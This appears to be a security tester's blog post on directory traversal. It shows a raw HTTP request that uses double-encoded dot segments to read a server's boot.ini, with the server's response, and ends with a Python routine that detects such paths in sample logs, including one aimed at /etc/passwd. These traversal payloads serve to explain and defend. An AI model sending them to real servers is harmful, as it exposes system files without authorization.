When application testing, I almost always find servers with outdated patching, and gold mines like these provide free information disclosure. Web root escaping (directory traversal) can give an attacker the ability to read arbitrary files on the server, so a fully patched web server is key to protecting against this vulnerability. Let’s check it out…

With this GET request, I escape the web root and read local files on the web server using double encoding (each %252e decodes to %2e, which decodes again to a plain dot, so the server ends up resolving ../ segments that a single-pass filter never saw):

GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
Referer: domain.com
Accept: */*
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20110614 Firefox/3.6.18
Host: domain.com
Connection: Keep-Alive

The response comes back with a 200 and the output below, and I can now view the contents of the server’s boot.ini file remotely through the web application:

HTTP/1.1 200 OK
Date: Thu, 31 Oct 2013 12:42:28 GMT
Server: Apache/2.2.22 (Ubuntu)
Content-Disposition: attachment; filename=../../boot.ini
Content-Language: en-US
Content-Length: 265
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8

[boot loader]
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows XP Professional" /fastdetect
multi(0)disk(0)rdisk(0)partition(2)\WINNT="Windows 2000 Professional" /fastdetect

In summary, ensure you are running the latest version of your web application server, and ask the vendor whether any patches or updates are available that mitigate this vulnerability specifically.
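As an added example (not part of the original post and not any server's own code), here is a Python check that treats a request path the way a hardened server or a log-review script should: percent-decode until nothing changes, canonicalize, then test containment in the web root, so a double-encoded path like the one above is judged after decoding rather than before. The document root /var/www/html, the access-log lines and the function names are constructed for this example.

```python
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # assumed document root for this example
MAX_DECODE_ROUNDS = 3        # bound repeated decoding so a crafted path cannot loop forever

def decode_to_fixed_point(path: str) -> tuple[str, int]:
    """Percent-decode until nothing changes, so %252e -> %2e -> '.' is seen the way a
    server that decodes twice would see it. Returns (decoded, rounds_used)."""
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def check_request_path(request_path: str, web_root: str = WEB_ROOT) -> tuple[bool, str]:
    """Decode, then canonicalize, then check containment: validating before decoding is
    what lets encoded dot segments through. Returns (allowed, detail)."""
    decoded, rounds = decode_to_fixed_point(request_path.split("?", 1)[0])
    if unquote(decoded) != decoded:   # still changing after the round limit: treat as hostile
        return False, "still decodable after %d rounds" % MAX_DECODE_ROUNDS
    decoded = decoded.replace("\\", "/")   # some servers accept backslash as a separator
    candidate = posixpath.normpath(posixpath.join(web_root, decoded.lstrip("/")))
    if candidate != web_root and not candidate.startswith(web_root + "/"):
        return False, "escapes web root -> %s (decoded %d time(s))" % (candidate, rounds)
    return True, candidate

# Constructed Apache access-log lines (not from the original post) to run the check over.
SAMPLE_LOG = """\
198.51.100.7 - - [31/Oct/2013:12:42:28 +0000] "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1" 200 265
198.51.100.7 - - [31/Oct/2013:12:43:01 +0000] "GET /index.html HTTP/1.1" 200 1024
198.51.100.7 - - [31/Oct/2013:12:43:09 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 210
"""
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def flag_traversal_attempts(log_text: str) -> list[tuple[str, str]]:
    """Return (request_path, detail) for every logged request that would escape the web root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            allowed, detail = check_request_path(m.group(1))
            if not allowed:
                hits.append((m.group(1), detail))
    return hits
```

Running flag_traversal_attempts(SAMPLE_LOG) flags the double-encoded boot.ini request and the single-encoded /etc/passwd request while leaving /index.html alone.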

Happy HTTP Halloween!